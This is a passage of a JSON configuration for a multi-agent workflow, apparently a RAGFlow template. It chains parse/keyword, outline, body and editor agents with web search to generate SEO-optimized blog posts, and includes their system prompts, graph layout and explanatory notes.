                            "sys_prompt": "# Role\n\nYou are the **Parse_And_Keyword_Agent**, responsible for interpreting a user's blog writing request and generating a structured writing intent summary and keyword strategy for SEO-optimized content generation.\n\n# Goals\n\n1. Extract and infer the user's true writing intent, even if the input is informal or vague.\n\n2. Identify the writing type, target audience, and implied goal.\n\n3. Suggest 3\u20135 long-tail keywords based on the input and context.\n\n4. Output all data in a Markdown format for downstream agents.\n\n# Operating Guidelines\n\n\n- If the user's input lacks clarity, make reasonable and **conservative** assumptions based on SEO best practices.\n\n- Always choose one clear \"Writing Type\" from the list below.\n\n- Your job is not to write the blog \u2014 only to structure the brief.\n\n# Output Format\n\n```markdown\n## Writing Type\n\n[Choose one: Tutorial / Informative Guide / Marketing Content / Case Study / Opinion Piece / How-to / Comparison Article]\n\n## Target Audience\n\n[Try to be specific based on clues in the input: e.g., marketing managers, junior developers, SEO beginners]\n\n## User Intent Summary\n\n[A 1\u20132 sentence summary of what the user wants to achieve with the blog post]\n\n## Suggested Long-tail Keywords\n\n- keyword 1\n\n- keyword 2\n\n- keyword 3\n\n- keyword 4 (optional)\n\n- keyword 5 (optional)\n\n\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\n\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
                            "temperature": 0.2,
                            "temperatureEnabled": true,
                            "tools": [],
                            "topPEnabled": false,
                            "top_p": 0.75,
                            "user_prompt": "",
                            "visual_files_var": ""
                        }
                    },
                    "upstream": [
                        "begin"
                    ]
                },
                "Agent:EagerNailsRemain": {
                    "downstream": [
                        "Agent:LovelyHeadsOwn"
                    ],
                    "obj": {
                        "component_name": "Agent",
                        "params": {
                            "delay_after_error": 1,
                            "description": "",
                            "exception_comment": "",
                            "exception_default_value": "",
                            "exception_goto": [],
                            "exception_method": null,
                            "frequencyPenaltyEnabled": false,
                            "frequency_penalty": 0.5,
                            "llm_id": "deepseek-chat@DeepSeek",
                            "maxTokensEnabled": false,
                            "max_retries": 3,
                            "max_rounds": 5,
                            "max_tokens": 4096,
                            "mcp": [],
                            "message_history_window_size": 12,
                            "outputs": {
                                "content": {
                                    "type": "string",
                                    "value": ""
                                }
                            },
                            "parameter": "Precise",
                            "presencePenaltyEnabled": false,
                            "presence_penalty": 0.5,
                            "prompts": [
                                {
                                    "content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\n\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}",
                                    "role": "user"
                                }
                            ],
                            "sys_prompt": "# Role\n\nYou are the **Body_Agent**, responsible for generating the full content of each section of an SEO-optimized blog based on the provided outline and keyword strategy.\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
                            "temperature": 0.2,
                            "temperatureEnabled": true,
                            "tools": [
                                {
                                    "component_name": "TavilySearch",
                                    "name": "TavilySearch",
                                    "params": {
                                        "api_key": "",
                                        "days": 7,
                                        "exclude_domains": [],
                                        "include_answer": false,
                                        "include_domains": [],
                                        "include_image_descriptions": false,
                                        "include_images": false,
                                        "include_raw_content": true,
                                        "max_results": 5,
                                        "outputs": {
                                            "formalized_content": {
                                                "type": "string",
                                                "value": ""
                                            },
                                            "json": {
                                                "type": "Array<Object>",
                                                "value": []
                                            }
                                        },
                                        "query": "sys.query",
                                        "search_depth": "basic",
                                        "topic": "general"
                                    }
                                }
                            ],
                            "topPEnabled": false,
                            "top_p": 0.75,
                            "user_prompt": "",
                            "visual_files_var": ""
                        }
                    },
                    "upstream": [
                        "Agent:BetterSitesSend"
                    ]
                },
                "Agent:LovelyHeadsOwn": {
                    "downstream": [
                        "Message:LegalBeansBet"
                    ],
                    "obj": {
                        "component_name": "Agent",
                        "params": {
                            "delay_after_error": 1,
                            "description": "",
                            "exception_comment": "",
                            "exception_default_value": "",
                            "exception_goto": [],
                            "exception_method": null,
                            "frequencyPenaltyEnabled": false,
                            "frequency_penalty": 0.5,
                            "llm_id": "deepseek-chat@DeepSeek",
                            "maxTokensEnabled": false,
                            "max_retries": 3,
                            "max_rounds": 5,
                            "max_tokens": 4096,
                            "mcp": [],
                            "message_history_window_size": 12,
                            "outputs": {
                                "content": {
                                    "type": "string",
                                    "value": ""
                                }
                            },
                            "parameter": "Precise",
                            "presencePenaltyEnabled": false,
                            "presence_penalty": 0.5,
                            "prompts": [
                                {
                                    "content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}\n\nThe Body agent output is {Agent:EagerNailsRemain@content}",
                                    "role": "user"
                                }
                            ],
                            "sys_prompt": "# Role\n\nYou are the **Editor_Agent**, responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n\n",
                            "temperature": 0.2,
                            "temperatureEnabled": true,
                            "tools": [],
                            "topPEnabled": false,
                            "top_p": 0.75,
                            "user_prompt": "",
                            "visual_files_var": ""
                        }
                    },
                    "upstream": [
                        "Agent:EagerNailsRemain"
                    ]
                },
                "Message:LegalBeansBet": {
                    "downstream": [],
                    "obj": {
                        "component_name": "Message",
                        "params": {
                            "content": [
                                "{Agent:LovelyHeadsOwn@content}"
                            ]
                        }
                    },
                    "upstream": [
                        "Agent:LovelyHeadsOwn"
                    ]
                },
                "begin": {
                    "downstream": [
                        "Agent:ClearRabbitsScream"
                    ],
                    "obj": {
                        "component_name": "Begin",
                        "params": {
                            "enablePrologue": true,
                            "inputs": {},
                            "mode": "conversational",
                            "prologue": "Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
                        }
                    },
                    "upstream": []
                }
            },
            "globals": {
                "sys.conversation_turns": 0,
                "sys.files": [],
                "sys.query": "",
                "sys.user_id": ""
            },
            "graph": {
                "edges": [
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__beginstart-Agent:ClearRabbitsScreamend",
                        "source": "begin",
                        "sourceHandle": "start",
                        "target": "Agent:ClearRabbitsScream",
                        "targetHandle": "end"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:ClearRabbitsScreamstart-Agent:BetterSitesSendend",
                        "source": "Agent:ClearRabbitsScream",
                        "sourceHandle": "start",
                        "target": "Agent:BetterSitesSend",
                        "targetHandle": "end"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:BetterSitesSendtool-Tool:SharpPensBurnend",
                        "source": "Agent:BetterSitesSend",
                        "sourceHandle": "tool",
                        "target": "Tool:SharpPensBurn",
                        "targetHandle": "end"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:BetterSitesSendstart-Agent:EagerNailsRemainend",
                        "source": "Agent:BetterSitesSend",
                        "sourceHandle": "start",
                        "target": "Agent:EagerNailsRemain",
                        "targetHandle": "end"
                    },
                    {
                        "id": "xy-edge__Agent:EagerNailsRemaintool-Tool:WickedDeerHealend",
                        "source": "Agent:EagerNailsRemain",
                        "sourceHandle": "tool",
                        "target": "Tool:WickedDeerHeal",
                        "targetHandle": "end"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:EagerNailsRemainstart-Agent:LovelyHeadsOwnend",
                        "source": "Agent:EagerNailsRemain",
                        "sourceHandle": "start",
                        "target": "Agent:LovelyHeadsOwn",
                        "targetHandle": "end"
                    },
                    {
                        "data": {
                            "isHovered": false
                        },
                        "id": "xy-edge__Agent:LovelyHeadsOwnstart-Message:LegalBeansBetend",
                        "source": "Agent:LovelyHeadsOwn",
                        "sourceHandle": "start",
                        "target": "Message:LegalBeansBet",
                        "targetHandle": "end"
                    }
                ],
                "nodes": [
                    {
                        "data": {
                            "form": {
                                "enablePrologue": true,
                                "inputs": {},
                                "mode": "conversational",
                                "prologue": "Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
                            },
                            "label": "Begin",
                            "name": "begin"
                        },
                        "id": "begin",
                        "measured": {
                            "height": 48,
                            "width": 200
                        },
                        "position": {
                            "x": 50,
                            "y": 200
                        },
                        "selected": false,
                        "sourcePosition": "left",
                        "targetPosition": "right",
                        "type": "beginNode"
                    },
                    {
                        "data": {
                            "form": {
                                "delay_after_error": 1,
                                "description": "",
                                "exception_comment": "",
                                "exception_default_value": "",
                                "exception_goto": [],
                                "exception_method": null,
                                "frequencyPenaltyEnabled": false,
                                "frequency_penalty": 0.5,
                                "llm_id": "deepseek-chat@DeepSeek",
                                "maxTokensEnabled": false,
                                "max_retries": 3,
                                "max_rounds": 1,
                                "max_tokens": 4096,
                                "mcp": [],
                                "message_history_window_size": 12,
                                "outputs": {
                                    "content": {
                                        "type": "string",
                                        "value": ""
                                    }
                                },
                                "parameter": "Precise",
                                "presencePenaltyEnabled": false,
                                "presence_penalty": 0.5,
                                "prompts": [
                                    {
                                        "content": "The user query is {sys.query}",
                                        "role": "user"
                                    }
                                ],
                                "sys_prompt": "# Role\n\nYou are the **Parse_And_Keyword_Agent**, responsible for interpreting a user's blog writing request and generating a structured writing intent summary and keyword strategy for SEO-optimized content generation.\n\n# Goals\n\n1. Extract and infer the user's true writing intent, even if the input is informal or vague.\n\n2. Identify the writing type, target audience, and implied goal.\n\n3. Suggest 3\u20135 long-tail keywords based on the input and context.\n\n4. Output all data in a Markdown format for downstream agents.\n\n# Operating Guidelines\n\n\n- If the user's input lacks clarity, make reasonable and **conservative** assumptions based on SEO best practices.\n\n- Always choose one clear \"Writing Type\" from the list below.\n\n- Your job is not to write the blog \u2014 only to structure the brief.\n\n# Output Format\n\n```markdown\n## Writing Type\n\n[Choose one: Tutorial / Informative Guide / Marketing Content / Case Study / Opinion Piece / How-to / Comparison Article]\n\n## Target Audience\n\n[Try to be specific based on clues in the input: e.g., marketing managers, junior developers, SEO beginners]\n\n## User Intent Summary\n\n[A 1\u20132 sentence summary of what the user wants to achieve with the blog post]\n\n## Suggested Long-tail Keywords\n\n- keyword 1\n\n- keyword 2\n\n- keyword 3\n\n- keyword 4 (optional)\n\n- keyword 5 (optional)\n\n\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\n\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
                                "temperature": 0.2,
                                "temperatureEnabled": true,
                                "tools": [],
                                "topPEnabled": false,
                                "top_p": 0.75,
                                "user_prompt": "",
                                "visual_files_var": ""
                            },
                            "label": "Agent",
                            "name": "Parse And Keyword Agent"
                        },
                        "dragging": false,
                        "id": "Agent:ClearRabbitsScream",
                        "measured": {
                            "height": 84,
                            "width": 200
                        },
                        "position": {
                            "x": 344.7766966202233,
                            "y": 234.82202253184496
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "agentNode"
                    },
                    {
                        "data": {
                            "form": {
                                "delay_after_error": 1,
                                "description": "",
                                "exception_comment": "",
                                "exception_default_value": "",
                                "exception_goto": [],
                                "exception_method": null,
                                "frequencyPenaltyEnabled": false,
                                "frequency_penalty": 0.3,
                                "llm_id": "deepseek-chat@DeepSeek",
                                "maxTokensEnabled": false,
                                "max_retries": 3,
                                "max_rounds": 3,
                                "max_tokens": 4096,
                                "mcp": [],
                                "message_history_window_size": 12,
                                "outputs": {
                                    "content": {
                                        "type": "string",
                                        "value": ""
                                    }
                                },
                                "parameter": "Balance",
                                "presencePenaltyEnabled": false,
                                "presence_penalty": 0.2,
                                "prompts": [
                                    {
                                        "content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}",
                                        "role": "user"
                                    }
                                ],
                                "sys_prompt": "# Role\n\nYou are the **Outline_Agent**, responsible for generating a clear and SEO-optimized blog outline based on the user's parsed writing intent and keyword strategy.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n  - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n  - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
                                "temperature": 0.5,
                                "temperatureEnabled": true,
                                "tools": [
                                    {
                                        "component_name": "TavilySearch",
                                        "name": "TavilySearch",
                                        "params": {
                                            "api_key": "",
                                            "days": 7,
                                            "exclude_domains": [],
                                            "include_answer": false,
                                            "include_domains": [],
                                            "include_image_descriptions": false,
                                            "include_images": false,
                                            "include_raw_content": true,
                                            "max_results": 5,
                                            "outputs": {
                                                "formalized_content": {
                                                    "type": "string",
                                                    "value": ""
                                                },
                                                "json": {
                                                    "type": "Array<Object>",
                                                    "value": []
                                                }
                                            },
                                            "query": "sys.query",
                                            "search_depth": "basic",
                                            "topic": "general"
                                        }
                                    }
                                ],
                                "topPEnabled": false,
                                "top_p": 0.85,
                                "user_prompt": "",
                                "visual_files_var": ""
                            },
                            "label": "Agent",
                            "name": "Outline Agent"
                        },
                        "dragging": false,
                        "id": "Agent:BetterSitesSend",
                        "measured": {
                            "height": 84,
                            "width": 200
                        },
                        "position": {
                            "x": 613.4368763415628,
                            "y": 164.3074269048589
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "agentNode"
                    },
                    {
                        "data": {
                            "form": {
                                "description": "This is an agent for a specific task.",
                                "user_prompt": "This is the order you need to send to the agent."
                            },
                            "label": "Tool",
                            "name": "flow.tool_0"
                        },
                        "dragging": false,
                        "id": "Tool:SharpPensBurn",
                        "measured": {
                            "height": 44,
                            "width": 200
                        },
                        "position": {
                            "x": 580.1877078861457,
                            "y": 287.7669662022325
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "toolNode"
                    },
                    {
                        "data": {
                            "form": {
                                "delay_after_error": 1,
                                "description": "",
                                "exception_comment": "",
                                "exception_default_value": "",
                                "exception_goto": [],
                                "exception_method": null,
                                "frequencyPenaltyEnabled": false,
                                "frequency_penalty": 0.5,
                                "llm_id": "deepseek-chat@DeepSeek",
                                "maxTokensEnabled": false,
                                "max_retries": 3,
                                "max_rounds": 5,
                                "max_tokens": 4096,
                                "mcp": [],
                                "message_history_window_size": 12,
                                "outputs": {
                                    "content": {
                                        "type": "string",
                                        "value": ""
                                    }
                                },
                                "parameter": "Precise",
                                "presencePenaltyEnabled": false,
                                "presence_penalty": 0.5,
                                "prompts": [
                                    {
                                        "content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\n\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}",
                                        "role": "user"
                                    }
                                ],
                                "sys_prompt": "# Role\n\nYou are the **Body_Agent**, responsible for generating the full content of each section of an SEO-optimized blog based on the provided outline and keyword strategy.\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
                                "temperature": 0.2,
                                "temperatureEnabled": true,
                                "tools": [
                                    {
                                        "component_name": "TavilySearch",
                                        "name": "TavilySearch",
                                        "params": {
                                            "api_key": "",
                                            "days": 7,
                                            "exclude_domains": [],
                                            "include_answer": false,
                                            "include_domains": [],
                                            "include_image_descriptions": false,
                                            "include_images": false,
                                            "include_raw_content": true,
                                            "max_results": 5,
                                            "outputs": {
                                                "formalized_content": {
                                                    "type": "string",
                                                    "value": ""
                                                },
                                                "json": {
                                                    "type": "Array<Object>",
                                                    "value": []
                                                }
                                            },
                                            "query": "sys.query",
                                            "search_depth": "basic",
                                            "topic": "general"
                                        }
                                    }
                                ],
                                "topPEnabled": false,
                                "top_p": 0.75,
                                "user_prompt": "",
                                "visual_files_var": ""
                            },
                            "label": "Agent",
                            "name": "Body Agent"
                        },
                        "dragging": false,
                        "id": "Agent:EagerNailsRemain",
                        "measured": {
                            "height": 84,
                            "width": 200
                        },
                        "position": {
                            "x": 889.0614605692713,
                            "y": 247.00973041799065
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "agentNode"
                    },
                    {
                        "data": {
                            "form": {
                                "description": "This is an agent for a specific task.",
                                "user_prompt": "This is the order you need to send to the agent."
                            },
                            "label": "Tool",
                            "name": "flow.tool_1"
                        },
                        "dragging": false,
                        "id": "Tool:WickedDeerHeal",
                        "measured": {
                            "height": 44,
                            "width": 200
                        },
                        "position": {
                            "x": 853.2006404239659,
                            "y": 364.37541577229143
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "toolNode"
                    },
                    {
                        "data": {
                            "form": {
                                "delay_after_error": 1,
                                "description": "",
                                "exception_comment": "",
                                "exception_default_value": "",
                                "exception_goto": [],
                                "exception_method": null,
                                "frequencyPenaltyEnabled": false,
                                "frequency_penalty": 0.5,
                                "llm_id": "deepseek-chat@DeepSeek",
                                "maxTokensEnabled": false,
                                "max_retries": 3,
                                "max_rounds": 5,
                                "max_tokens": 4096,
                                "mcp": [],
                                "message_history_window_size": 12,
                                "outputs": {
                                    "content": {
                                        "type": "string",
                                        "value": ""
                                    }
                                },
                                "parameter": "Precise",
                                "presencePenaltyEnabled": false,
                                "presence_penalty": 0.5,
                                "prompts": [
                                    {
                                        "content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}\n\nThe Body agent output is {Agent:EagerNailsRemain@content}",
                                        "role": "user"
                                    }
                                ],
                                "sys_prompt": "# Role\n\nYou are the **Editor_Agent**, responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n\n",
                                "temperature": 0.2,
                                "temperatureEnabled": true,
                                "tools": [],
                                "topPEnabled": false,
                                "top_p": 0.75,
                                "user_prompt": "",
                                "visual_files_var": ""
                            },
                            "label": "Agent",
                            "name": "Editor Agent"
                        },
                        "dragging": false,
                        "id": "Agent:LovelyHeadsOwn",
                        "measured": {
                            "height": 84,
                            "width": 200
                        },
                        "position": {
                            "x": 1160.3332919804993,
                            "y": 149.50806732882472
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "agentNode"
                    },
                    {
                        "data": {
                            "form": {
                                "content": [
                                    "{Agent:LovelyHeadsOwn@content}"
                                ]
                            },
                            "label": "Message",
                            "name": "Response"
                        },
                        "dragging": false,
                        "id": "Message:LegalBeansBet",
                        "measured": {
                            "height": 56,
                            "width": 200
                        },
                        "position": {
                            "x": 1370.6665839609984,
                            "y": 267.0323933738015
                        },
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "messageNode"
                    },
                    {
                        "data": {
                            "form": {
                                "text": "This workflow automatically generates a complete SEO-optimized blog article based on a simple user input. You don\u2019t need any writing experience. Just provide a topic or short request \u2014 the system will handle the rest.\n\nThe process includes the following key stages:\n\n1. **Understanding your topic and goals**\n2. **Designing the blog structure**\n3. **Writing high-quality content**\n\n\n"
                            },
                            "label": "Note",
                            "name": "Workflow Overall Description"
                        },
                        "dragHandle": ".note-drag-handle",
                        "dragging": false,
                        "height": 205,
                        "id": "Note:SlimyGhostsWear",
                        "measured": {
                            "height": 205,
                            "width": 415
                        },
                        "position": {
                            "x": -284.3143151688742,
                            "y": 150.47632147913419
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 415
                    },
                    {
                        "data": {
                            "form": {
                                "text": "**Purpose**:  \nThis agent reads the user\u2019s input and figures out what kind of blog needs to be written.\n\n**What it does**:\n- Understands the main topic you want to write about  \n- Identifies who the blog is for (e.g., beginners, marketers, developers)  \n- Determines the writing purpose (e.g., SEO traffic, product promotion, education)  \n- Suggests 3\u20135 long-tail SEO keywords related to the topic"
                            },
                            "label": "Note",
                            "name": "Parse And Keyword Agent"
                        },
                        "dragHandle": ".note-drag-handle",
                        "dragging": false,
                        "height": 152,
                        "id": "Note:EmptyChairsShake",
                        "measured": {
                            "height": 152,
                            "width": 340
                        },
                        "position": {
                            "x": 295.04147626768133,
                            "y": 372.2755718118446
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 340
                    },
                    {
                        "data": {
                            "form": {
                                "text": "**Purpose**:  \nThis agent builds the blog structure \u2014 just like writing a table of contents before you start writing the full article.\n\n**What it does**:\n- Suggests a clear blog title that includes important keywords  \n- Breaks the article into sections using H2 and H3 headings (like a professional blog layout)  \n- Assigns 1\u20132 recommended keywords to each section to help with SEO  \n- Follows the writing goal and target audience set in the previous step"
                            },
                            "label": "Note",
                            "name": "Outline Agent"
                        },
                        "dragHandle": ".note-drag-handle",
                        "dragging": false,
                        "height": 146,
                        "id": "Note:TallMelonsNotice",
                        "measured": {
                            "height": 146,
                            "width": 343
                        },
                        "position": {
                            "x": 598.5644991893463,
                            "y": 5.801054564756448
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 343
                    },
                    {
                        "data": {
                            "form": {
                                "text": "**Purpose**:  \nThis agent is responsible for writing the actual content of the blog \u2014 paragraph by paragraph \u2014 based on the outline created earlier.\n\n**What it does**:\n- Looks at each H2/H3 section in the outline  \n- Writes 150\u2013220 words of clear, helpful, and well-structured content per section  \n- Includes the suggested SEO keywords naturally (not keyword stuffing)  \n- Uses real examples or facts if needed (by calling a web search tool like Tavily)"
                            },
                            "label": "Note",
                            "name": "Body Agent"
                        },
                        "dragHandle": ".note-drag-handle",
                        "dragging": false,
                        "height": 137,
                        "id": "Note:RipeCougarsBuild",
                        "measured": {
                            "height": 137,
                            "width": 319
                        },
                        "position": {
                            "x": 860.4854129814981,
                            "y": 427.2196835690842
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 319
                    },
                    {
                        "data": {
                            "form": {
                                "text": "**Purpose**:  \nThis agent reviews the entire blog draft to make sure it is smooth, professional, and SEO-friendly. It acts like a human editor before publishing.\n\n**What it does**:\n- Polishes the writing: improves sentence clarity, fixes awkward phrasing  \n- Makes sure the content flows well from one section to the next  \n- Double-checks keyword usage: are they present, natural, and not overused?  \n- Verifies the blog structure (H1, H2, H3 headings) is correct  \n- Adds two key SEO elements:\n  - **Meta Title** (shows up in search results)\n  - **Meta Description** (summary for Google and social sharing)"
                            },
                            "label": "Note",
                            "name": "Editor Agent"
                        },
                        "dragHandle": ".note-drag-handle",
                        "height": 146,
                        "id": "Note:OpenTurkeysSell",
                        "measured": {
                            "height": 146,
                            "width": 320
                        },
                        "position": {
                            "x": 1129,
                            "y": -30
                        },
                        "resizing": false,
                        "selected": false,
                        "sourcePosition": "right",
                        "targetPosition": "left",
                        "type": "noteNode",
                        "width": 320
                    }
                ]
            },
            "history": [],
            "messages": [],
            "path": [],
            "retrieval": []
        },
